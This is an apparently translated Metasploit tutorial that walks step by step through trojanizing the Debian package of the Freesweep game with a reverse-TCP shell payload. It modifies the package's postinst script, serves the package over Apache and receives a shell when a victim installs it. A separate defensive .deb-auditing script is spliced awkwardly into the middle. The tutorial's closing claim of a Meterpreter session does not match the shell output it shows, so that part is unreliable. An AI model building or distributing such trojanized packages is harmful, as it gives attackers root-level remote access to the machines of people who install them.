[Metasploit] Infecting Linux with a Trojan
[Metasploit By: Shell Root]
In the previous post we turned a payload into an executable file to infect Windows; now we will do the same, but to infect Linux.
To avoid suspicion we download a game, in this case "Freesweep", which we will then infect with the payload.
Reading state information... Done
The following packages will be upgraded:
  freesweep
1 upgraded, 0 newly installed, 0 to remove and 183 not upgraded.
Need to get 39.2kB of archives.
After this operation, 172kB of additional disk space will be used.
Download complete and in download only mode
shellroot@shellroot-desktop:~$
Create a folder to keep the files organized; in this case it will be /home/shellroot/Trojan.
shellroot@shellroot-desktop:~$ mkdir /home/shellroot/Trojan
shellroot@shellroot-desktop:~$
Now move the file you just downloaded into the folder you just created (/home/shellroot/Trojan).
shellroot@shellroot-desktop:~$ sudo mv /var/cache/apt/archives/freesweep_0.90-2_i386.deb /home/shellroot/Trojan
shellroot@shellroot-desktop:~$
We change into the folder /home/shellroot/Trojan and modify its permissions.
shellroot@shellroot-desktop:~$ cd /home/shellroot/Trojan
shellroot@shellroot-desktop:~/Trojan$ chmod 777 /home/shellroot/Trojan
shellroot@shellroot-desktop:~/Trojan$
Unpack the file freesweep_0.90-2_i386.deb inside the folder /home/shellroot/Trojan in order to add the infection PAYLOAD.
shellroot@shellroot-desktop:~/Trojan$ dpkg -x freesweep_0.90-2_i386.deb Juego
shellroot@shellroot-desktop:~/Trojan$
Now create a folder called DEBIAN and, inside it, create 2 files: control and postinst.
shellroot@shellroot-desktop:~/Trojan$ mkdir Juego/DEBIAN
shellroot@shellroot-desktop:~/Trojan$ cd Juego/DEBIAN
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$
Inside the control file we put the following information:
Package: freesweep
Version: 0.90-1
Section: Games & Fun
Priority: Medium
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without setting any off, based on hints given by the computer.
Now, inside the postinst file, put a script that executes our infected file.
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
Now create the Trojan with the linux/x86/shell/reverse_tcp PAYLOAD, giving it the LHOST and LPORT parameters and the location of the infected file.
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$ msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.142.137 LPORT=1234 X > /home/shellroot/Trojan/Juego/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
 Length: 50
Options: LHOST=192.168.142.137,LPORT=1234
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$
Now we modify the permissions of the postinst file and build the package again, which is supposedly just the "Game".
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$ chmod 755 postinst
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$ dpkg-deb --build /home/shellroot/Trojan/Juego/
dpkg-deb: building package `freesweep' in `/home/shellroot/Trojan/Juego.deb'.
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$
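The whole trick in the steps above is the postinst maintainer script: dpkg runs it as root during installation, and a package fetched with wget and installed with `dpkg -i` is never checked against a repository signature. The script below is an added example, not code from the original post or from Metasploit: it parses a .deb (an `ar` archive holding debian-binary, control.tar.* and data.tar.*) without dpkg, pulls the preinst/postinst/prerm/postrm scripts out of control.tar.*, and flags the constructs a reviewer would not expect a game package to ship (setuid/setgid chmod, backgrounded commands, sudo, network clients). The two packages it builds at the bottom are constructed test input; the first carries a postinst like the one in the post, the second a harmless one.

```python
"""Audit the maintainer scripts inside a .deb before `dpkg -i` runs them as root.

Added example, not code from the original post. Parses the .deb (an `ar`
archive of debian-binary, control.tar.* and data.tar.*) without dpkg, pulls
the maintainer scripts out of control.tar.* and flags constructs a game
package has no business shipping. The packages built at the bottom are
constructed test input; the first mirrors the postinst shown in the post.
"""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# (label, pattern): constructs that warrant reading the script before installing.
SUSPICIOUS = [
    # chmod granting a setuid/setgid bit, numerically (2755, 4755) or as u+s/g+s
    ("setuid/setgid chmod", re.compile(r"\bchmod\s+(?:[2-7]\d{3}|[ug]\+s)\b")),
    # a lone '&' that backgrounds a command (excludes '&&' and '2>&1')
    ("background execution", re.compile(r"(?<![&>])&(?!&)")),
    ("sudo inside maintainer script", re.compile(r"\bsudo\b")),
    ("network client invoked", re.compile(r"\b(?:wget|curl|nc|ncat|socat)\b")),
]


def parse_ar(blob: bytes) -> dict:
    """Return {member name: bytes} for a classic `ar` archive such as a .deb."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                  # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)             # member data is padded to an even length
    return members


def extract_maintainer_scripts(deb: bytes) -> dict:
    """Return {script name: text} for the maintainer scripts found in control.tar.*."""
    members = parse_ar(deb)
    control = next((v for k, v in members.items() if k.startswith("control.tar")), None)
    if control is None:
        raise ValueError("no control.tar member; not a .deb")
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:*") as tar:
        for member in tar.getmembers():
            base = member.name.rsplit("/", 1)[-1]
            if member.isfile() and base in MAINTAINER_SCRIPTS:
                scripts[base] = tar.extractfile(member).read().decode(errors="replace")
    return scripts


def audit_deb(deb: bytes) -> list:
    """Return (script, line number, label) for every suspicious line found."""
    findings = []
    for name, text in sorted(extract_maintainer_scripts(deb).items()):
        for lineno, line in enumerate(text.splitlines(), 1):
            if line.lstrip().startswith("#"):     # skip the shebang and comments
                continue
            findings += [(name, lineno, label) for label, pat in SUSPICIOUS if pat.search(line)]
    return findings


def build_deb(control_files: dict) -> bytes:
    """Assemble a minimal .deb (empty data.tar.gz) from control-directory files; test input only."""
    def targz(files: dict) -> bytes:
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:gz") as tar:
            for fname, text in files.items():
                data = text.encode()
                info = tarfile.TarInfo(name="./" + fname)
                info.size, info.mode = len(data), 0o755
                tar.addfile(info, io.BytesIO(data))
        return buf.getvalue()

    def member(name: str, data: bytes) -> bytes:
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        return hdr + data + (b"\n" if len(data) % 2 else b"")

    return (b"!<arch>\n" + member("debian-binary", b"2.0\n")
            + member("control.tar.gz", targz(control_files))
            + member("data.tar.gz", targz({})))


# Constructed test packages: a postinst like the one in the post, and a harmless one.
CONTROL = ("Package: freesweep\nVersion: 0.90-1\nArchitecture: i386\n"
           "Maintainer: constructed example <nobody@example.invalid>\n"
           "Description: constructed test package\n")
TROJANIZED_POSTINST = ("#!/bin/sh\n"
                       "sudo chmod 2755 /usr/games/freesweep_scores && "
                       "/usr/games/freesweep_scores & /usr/games/freesweep &\n")
BENIGN_POSTINST = '#!/bin/sh\nset -e\nif [ "$1" = configure ]; then\n    update-menus || true\nfi\n'
TROJANIZED_DEB = build_deb({"control": CONTROL, "postinst": TROJANIZED_POSTINST})
BENIGN_DEB = build_deb({"control": CONTROL, "postinst": BENIGN_POSTINST})

if __name__ == "__main__":
    for kind, deb in (("trojanized", TROJANIZED_DEB), ("benign", BENIGN_DEB)):
        findings = audit_deb(deb)
        print(f"{kind}: {len(findings)} finding(s)")
        for script, lineno, label in findings:
            print(f"  {script}:{lineno}: {label}")
```

Run against the constructed trojanized package it reports three findings on postinst line 2 (setuid/setgid chmod, background execution, sudo) and nothing for the benign one. On a real system the equivalent manual check is `dpkg-deb -e pkg.deb ctl` to drop the control directory and `dpkg-deb -c pkg.deb` to list what will be written to disk; read both before `sudo dpkg -i`, and prefer installing from a signed repository with apt, which verifies the Release signature, over a package fetched with wget.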
Rebuilding
The build creates the file Juego.deb, which we must rename to freesweep.deb, so we go to the folder /home/shellroot/Trojan and then move it to the web server root, ready for the next strike and infection.
shellroot@shellroot-desktop:~/Trojan/Juego/DEBIAN$ cd /home/shellroot/Trojan
shellroot@shellroot-desktop:~/Trojan$ mv Juego.deb freesweep.deb
shellroot@shellroot-desktop:~/Trojan$ sudo cp freesweep.deb /var/www/
[sudo] password for shellroot:
shellroot@shellroot-desktop:~/Trojan$
We start the Apache server.
shellroot@shellroot-desktop:~/Trojan$ sudo /etc/init.d/apache2 start
 * Starting web server apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
httpd (pid 1576) already running
[ OK ]
shellroot@shellroot-desktop:~/Trojan$
Now, as we did with Windows, we use the multi/handler auxiliary module, configured the same way as when we created the PAYLOAD, and wait for the victim to download and run the infected file.
shellroot@shellroot-desktop:~$ sudo msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.142.137 LPORT=1234 E
[sudo] password for shellroot:
[*] Please wait while we load the module tree...
[*] Starting the payload handler...
[*] Started reverse handler on port 1234
Now suppose that we are the victim and download the file.
hacklab@hacklab-desktop:~$ wget http://192.168.142.137/freesweep.deb
--2010-01-21 23:36:27--  http://192.168.142.137/freesweep.deb
Connecting to 192.168.142.137:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39214 (38K) [application/x-debian-package]
Saving to: `freesweep.deb'
100%[======================================>] 39,214      --.-K/s   in 0s
2010-01-21 23:36:29 (93.0 MB/s) - `freesweep.deb' saved [39214/39214]
hacklab@hacklab-desktop:~$
After downloading the file, we install it.
hacklab@hacklab-desktop:~$ sudo dpkg -i freesweep.deb
Now look at the multi/handler: voilà, a Meterpreter session.
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.142.137:1234 -> 192.168.142.140:41233)